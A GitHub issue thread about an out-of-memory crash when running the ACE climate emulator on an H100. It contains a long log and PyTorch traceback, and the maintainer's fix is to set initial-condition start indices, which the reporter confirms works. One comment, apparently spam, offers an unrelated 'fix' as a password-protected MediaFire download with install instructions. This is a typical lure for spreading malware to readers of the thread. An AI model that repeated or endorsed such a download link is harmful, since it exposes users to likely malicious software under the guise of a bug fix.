### ISSUE TITLE
Out of memory at inference time

### ISSUE THREAD

**Issue by Zappandy** [ai2cm/ace#11]
I've been trying to run ACE at inference time using a single NVIDIA Hopper H100 64GB HBM2 on an HPC, and we've even tried to run it on 4 H100s, but I keep getting PyTorch memory allocation errors. To further test this out, I dropped the number of forward steps to lower values (200, 100, 50, and even 2). Regardless of the amount, the code crashes before completing a single step. Note that we're using the initial condition from January 1st, 2021 (i.e. 2021010100.nc) and the model checkpoint provided on the Zenodo repository.

I double checked the computational complexity on the paper and saw you guys were running inference on a single A100, so I'm leaning on this being a data loading issue. We were able to isolate the problem to the ```SingleModuleStepperConfig``` class on the [stepper script](https://github.com/ai2cm/ace/blob/main/fme/fme/core/stepper.py) as the code seems to crash on line 378 (```self.module = dist.wrap_module(self.module)```).

This is the current output when we try to run inference
```
2024-08-27 10:24:46,356 - root - WARNING - Environmental variable BEAKER_EXPERIMENT_ID not found.
2024-08-27 10:24:46,358 - root - WARNING - Environmental variable SLURM_JOB_ID not found.
2024-08-27 10:24:46,358 - root - WARNING - Environmental variable SLURM_JOB_USER not found.
2024-08-27 10:24:46,358 - root - WARNING - Environmental variable FME_TRAIN_DIR not found.
2024-08-27 10:24:46,358 - root - WARNING - Environmental variable FME_VALID_DIR not found.
2024-08-27 10:24:46,358 - root - WARNING - Environmental variable FME_STATS_DIR not found.
2024-08-27 10:24:46,358 - root - WARNING - Environmental variable FME_CHECKPOINT_DIR not found.
2024-08-27 10:24:46,358 - root - WARNING - Environmental variable FME_OUTPUT_DIR not found.
2024-08-27 10:24:46,358 - root - WARNING - Environmental variable FME_IMAGE not found.
2024-08-27 10:24:46,358 - root - WARNING - Beaker Experiment ID not found.
2024-08-27 10:24:46,358 - root - INFO - --------------- Versions ---------------
2024-08-27 10:24:46,358 - root - INFO - Torch: 2.1.0a0+29c30b1
2024-08-27 10:24:46,358 - root - INFO - ----------------------------------------
2024-08-27 10:24:46,722 - root - INFO - Current device is cuda:0
2024-08-27 10:24:46,722 - root - INFO - Loading trained model checkpoint from /gpfs/projects/bsc32/bsc032010/ace-data/ace_ckpt.tar
2024-08-27 10:24:48,906 - root - INFO - Loading initial condition data
2024-08-27 10:24:50,460 - root - INFO - Initializing forcing data loaded
2024-08-27 10:24:50,479 - root - INFO - Opening data at /gpfs/projects/bsc32/bsc032010/ace-data/*.nc
2024-08-27 10:24:54,128 - root - INFO - Found 1060 samples.
2024-08-27 10:24:54,128 - root - INFO - Image shape is 180 x 360.
2024-08-27 10:24:54,128 - root - INFO - Following variables are available: ['DLWRFsfc', 'DSWRFsfc', 'DSWRFtoa', 'GRAUPELsfc', 'HGTsfc', 'ICEsfc', 'LHTFLsfc', 'PRATEsfc', 'PRESsfc', 'SHTFLsfc', 'SNOWsfc', 'ULWRFsfc', 'ULWRFtoa', 'USWRFsfc', 'USWRFtoa', 'air_temperature_0', 'air_temperature_1', 'air_temperature_2', 'air_temperature_3', 'air_temperature_4', 'air_temperature_5', 'air_temperature_6', 'air_temperature_7', 'ak_0', 'ak_1', 'ak_2', 'ak_3', 'ak_4', 'ak_5', 'ak_6', 'ak_7', 'ak_8', 'bk_0', 'bk_1', 'bk_2', 'bk_3', 'bk_4', 'bk_5', 'bk_6', 'bk_7', 'bk_8', 'eastward_wind_0', 'eastward_wind_1', 'eastward_wind_2', 'eastward_wind_3', 'eastward_wind_4', 'eastward_wind_5', 'eastward_wind_6', 'eastward_wind_7', 'grid_xt', 'grid_yt', 'land_fraction', 'northward_wind_0', 'northward_wind_1', 'northward_wind_2', 'northward_wind_3', 'northward_wind_4', 'northward_wind_5', 'northward_wind_6', 'northward_wind_7', 'ocean_fraction', 'sea_ice_fraction', 'soil_moisture', 'specific_total_water_0', 'specific_total_water_1', 'specific_total_water_2', 'specific_total_water_3', 'specific_total_water_4', 'specific_total_water_5', 'specific_total_water_6', 'specific_total_water_7', 'surface_temperature', 'tendency_of_total_water_path', 'tendency_of_total_water_path_due_to_advection', 'time', 'total_water_path'].
2024-08-27 10:24:54,378 - root - INFO - Opening data at /gpfs/projects/bsc32/bsc032010/ace-data/*.nc
2024-08-27 10:24:56,013 - root - INFO - Found 1060 samples.
2024-08-27 10:24:56,014 - root - INFO - Image shape is 180 x 360.
2024-08-27 10:24:56,014 - root - INFO - Following variables are available: ['DLWRFsfc', 'DSWRFsfc', 'DSWRFtoa', 'GRAUPELsfc', 'HGTsfc', 'ICEsfc', 'LHTFLsfc', 'PRATEsfc', 'PRESsfc', 'SHTFLsfc', 'SNOWsfc', 'ULWRFsfc', 'ULWRFtoa', 'USWRFsfc', 'USWRFtoa', 'air_temperature_0', 'air_temperature_1', 'air_temperature_2', 'air_temperature_3', 'air_temperature_4', 'air_temperature_5', 'air_temperature_6', 'air_temperature_7', 'ak_0', 'ak_1', 'ak_2', 'ak_3', 'ak_4', 'ak_5', 'ak_6', 'ak_7', 'ak_8', 'bk_0', 'bk_1', 'bk_2', 'bk_3', 'bk_4', 'bk_5', 'bk_6', 'bk_7', 'bk_8', 'eastward_wind_0', 'eastward_wind_1', 'eastward_wind_2', 'eastward_wind_3', 'eastward_wind_4', 'eastward_wind_5', 'eastward_wind_6', 'eastward_wind_7', 'grid_xt', 'grid_yt', 'land_fraction', 'northward_wind_0', 'northward_wind_1', 'northward_wind_2', 'northward_wind_3', 'northward_wind_4', 'northward_wind_5', 'northward_wind_6', 'northward_wind_7', 'ocean_fraction', 'sea_ice_fraction', 'soil_moisture', 'specific_total_water_0', 'specific_total_water_1', 'specific_total_water_2', 'specific_total_water_3', 'specific_total_water_4', 'specific_total_water_5', 'specific_total_water_6', 'specific_total_water_7', 'surface_temperature', 'tendency_of_total_water_path', 'tendency_of_total_water_path_due_to_advection', 'time', 'total_water_path'].
2024-08-27 10:24:56,080 - root - INFO - Multiprocessing inference context: fork
2024-08-27 10:24:56,080 - root - INFO - Loading trained model checkpoint from /gpfs/projects/bsc32/bsc032010/ace-data/ace_ckpt.tar
2024-08-27 10:24:58,698 - root - INFO - Starting inference
2024-08-27 10:25:37,291 - root - INFO - Inference: starting window spanning 0 to 50 steps.
Traceback (most recent call last):
  File "/usr/lib/python3.10/runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.10/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/full-model/fme/fme/ace/inference/__main__.py", line 8, in <module>
    main(yaml_config=args.yaml_config)
  File "/full-model/fme/fme/ace/inference/inference.py", line 221, in main
    run_inference_from_config(config)
  File "/full-model/fme/fme/ace/inference/inference.py", line 275, in run_inference_from_config
    timers = run_inference(
  File "/full-model/fme/fme/ace/inference/loop.py", line 197, in run_inference
    prediction = stepper.predict(
  File "/full-model/fme/fme/core/stepper.py", line 508, in predict
    state = self.step(input_data, next_step_ocean_data)
  File "/full-model/fme/fme/core/stepper.py", line 460, in step
    output_tensor = self.module(input_tensor)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1505, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1514, in _call_impl
    return forward_call(*args, **kwargs)
  File "/full-model/fme/fme/core/distributed.py", line 26, in forward
    return self.module(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1505, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1514, in _call_impl
    return forward_call(*args, **kwargs)
  File "/full-model/fme/fme/ace/models/modulus/sfnonet.py", line 708, in forward
    x = self._forward_features(x)
  File "/full-model/fme/fme/ace/models/modulus/sfnonet.py", line 678, in _forward_features
    x = blk(x)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1505, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1514, in _call_impl
    return forward_call(*args, **kwargs)
  File "/full-model/fme/fme/ace/models/modulus/sfnonet.py", line 222, in forward
    x, residual = self.filter(x_norm)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1505, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1514, in _call_impl
    return forward_call(*args, **kwargs)
  File "/full-model/fme/fme/ace/models/modulus/sfnonet.py", line 120, in forward
    return self.filter(x)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1505, in _wrapped_call_impl
    return self._call_impl(*args, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/torch/nn/modules/module.py", line 1514, in _call_impl
    return forward_call(*args, **kwargs)
  File "/full-model/fme/fme/ace/models/modulus/s2convolutions.py", line 178, in forward
    xp[..., : self.modes_lat_local, : self.modes_lon_local] = self._contract(
  File "/full-model/fme/fme/ace/models/modulus/factorizations.py", line 211, in _contract_dense_pytorch
    x = _contract_dhconv(x, weight)
RuntimeError: The following operation failed in the TorchScript interpreter.
Traceback of TorchScript (most recent call last):
  File "/full-model/fme/fme/ace/models/modulus/contractions.py", line 193, in _contract_dhconv
    ac = torch.view_as_complex(a)
    bc = torch.view_as_complex(b)
    resc = torch.einsum("bixy,iox->boxy", ac, bc)
           ~~~~~~~~~~~~ <--- HERE
    res = torch.view_as_real(resc)
    return res
RuntimeError: CUDA out of memory. Tried to allocate 7.71 GiB. GPU 0 has a total capacty of 63.43 GiB of which 2.30 GiB is free. Including non-PyTorch memory, this process has 61.12 GiB memory in use. Of the allocated memory 51.79 GiB is allocated by PyTorch, and 8.59 GiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting max_split_size_mb to avoid fragmentation.  See documentation for Memory Management and PYTORCH_CUDA_ALLOC_CONF
```

**Comment by oliverwm1** [comment]
Thanks for reporting. Indeed you should easily be able to do inference with a single H100. Could you provide an example of the exact config you are using?

I suspect this may be happening since by default all available time steps in the provided initial condition file are used. Try adding
```
initial_condition:
  path: ...
  start_indices:
    list:
      - 0
```
to your config. More options for specifying which time steps to use for the initial condition can be found here: https://ai2-climate-emulator.readthedocs.io/en/latest/api.html#fme.ace.InitialConditionConfig

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Zappandy** [comment]
```
n_forward_steps: 400  # 100 days
forward_steps_in_memory: 50
checkpoint_path: /gpfs/projects/bsc32/bsc032010/ace-data/ace_ckpt.tar
logging:
  log_to_screen: true
  log_to_wandb: false
  log_to_file: true
  project: ace_test
  entity: ml-bsc
initial_condition:
  path: /gpfs/projects/bsc32/bsc032010/ace-data/2021010100.nc
forcing_loader:
  dataset:
    data_path: /gpfs/projects/bsc32/bsc032010/ace-data/
  num_data_workers: 8
data_writer:
  save_prediction_files: false
  save_monthly_files: false
```
Thank you, yeah, I was missing the start index, sorry about that. We added it and the model ran under 32 seconds!

**Comment by oliverwm1** [comment]
Great, glad that worked.
